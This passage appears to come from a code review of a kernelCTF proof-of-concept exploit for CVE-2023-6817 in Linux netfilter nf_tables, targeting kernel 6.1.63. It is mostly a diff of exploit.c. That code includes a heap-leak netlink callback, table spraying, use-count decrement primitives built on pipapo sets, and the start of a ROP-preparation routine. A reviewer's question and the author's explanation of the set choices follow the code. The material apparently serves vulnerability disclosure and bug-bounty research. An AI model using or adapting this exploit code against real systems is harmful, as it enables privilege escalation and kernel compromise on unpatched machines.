pocs/linux/kernelctf/CVE-2023-6817_lts_cos/exploit/lts-6.1.63/exploit.c

```diff
@@ -0,0 +1,485 @@
+        memset(tb_msg3, 0, NFTA_SET_MAX * 8);
+        nla_parse_nested(tb_msg3, NFTA_SET_MAX, tb_msg2[1],NULL);
+        char *val = malloc(nla_len(tb_msg3[NFTA_SET_ELEM_KEY]));
+        nla_memcpy(val, tb_msg3[NFTA_SET_ELEM_KEY], nla_len(tb_msg3[NFTA_SET_ELEM_KEY]));
+        //printf("Get key : %llx\n", *(uint64_t *)(val+4));
+        uint32_t udata_len = nla_len(tb_msg3[NFTA_SET_ELEM_USERDATA]);
+        if(udata_len != 0xa1)
+		printf("udata len : %d\n",udata_len);
+        if(udata_len > 0xb0){
+            //get leak
+            printf("udata len : %d\n",udata_len);
+            leak_data = malloc(nla_len(tb_msg3[NFTA_SET_ELEM_USERDATA]));
+            memset(leak_data,0,nla_len(tb_msg3[NFTA_SET_ELEM_USERDATA]));
+            nla_memcpy(leak_data, tb_msg3[NFTA_SET_ELEM_USERDATA], nla_len(tb_msg3[NFTA_SET_ELEM_USERDATA]));
+            printf("Target key : %llx\n",*(uint64_t *)(val+4));
+        }
+    }
+    else
+        printf("No NFTA_SET_ELEM_LIST_ELEMENTS\n");
+    return NL_OK;
+}
+
+void spray_tables(struct nl_sock * socket, int len, char *udata, int size){
+   char *tmp = malloc(0x100);
+   memset(tmp,0,0x100);
+   int i;
+   for(i=0;i<len;i++){
+        snprintf(tmp, 0x100, "table_for_leak_%ld", table_num);
+        new_table_with_udata(socket, tmp, udata, size);
+        ++table_num;
+   }
+   free(tmp);
+}
+//make target_obj->use--
+void primitive_0(struct nl_sock *socket, char *table, char *target_obj){
+    char *tmp_set = "pipapo set for primitive";
+    new_set_pipapo(socket,table, tmp_set, 0x40, NFT_OBJECT_CT_EXPECT);
+    char *key = malloc(0x40);
+    char *key_end = malloc(0x40);
+    memset(key,0,0x40);
+    memset(key_end,0,0x40);
+    new_setelem(socket, table, tmp_set, NULL, 0, target_obj, key, 0x40, key_end, 0x40, 0);
+    
+    struct nlmsghdr **msg_list = malloc(sizeof(struct nlmsghdr *)*2);
+    msg_list[0] = del_setelem_msg(table, tmp_set, key, 0x40, key_end, 0x40);
+    msg_list[1] = del_set_msg(table, tmp_set);
+    send_msg_list(socket, msg_list, 2);
+}
+
+
+
+void primitive_1(struct nl_sock *socket, char *table, char *target_chain){
+    char *tmp_set = "pipapo set for primitive";
+    new_set_pipapo_for_poc_chain(socket, table, tmp_set, 0x40);
+    char *key = malloc(0x40);
+    char *key_end = malloc(0x40);
+    memset(key,0,0x40);
+    memset(key_end,0,0x40);
+    //new_setelem(socket, table, tmp_set, NULL, 0, target_obj, key, 0x40, key_end, 0x40, 0);
+    new_setelem_with_chain(socket, table, tmp_set, NULL, 0, key, 0x40, key_end, 0x40, target_chain);
+    struct nlmsghdr **msg_list = malloc(sizeof(struct nlmsghdr *)*2);
+    msg_list[0] = del_setelem_msg(table, tmp_set, key, 0x40, key_end, 0x40);
+    msg_list[1] = del_set_msg(table, tmp_set);
+    send_msg_list(socket, msg_list, 2);
+}
+
+void leak_and_prepare_rop(struct nl_sock *socket){
+    int i;
+    char *pipapo_set = "set pipapo for leak";
+    char *hash_set = "set hashtable for leak";
+    char *hash_set_2 = "set hashtable 2 for leak";
```

Comment:
Why are 3 different sets for the objects? Is there any reason why each of them is a different type of set (hashtable with map, hash set, PIPAPO set)? The PIPAPO set used to trigger the bug is created separately in primitive_0/primitive_1.

Reply:
There is no special reason for pipapo_set and hash_set_2, just reuse the previous code. The use of hash_set (hashtable with map) is to use NFTA_SET_ELEM_DATA when applying for the heap back in step 5, and https://elixir.bootlin.com/linux/v6.1.63/source/net/netfilter/nf_tables_api.c#L6283 restricts the use of NFTA_SET_ELEM_DATA to satisfy set->flags & NFT_SET_MAP.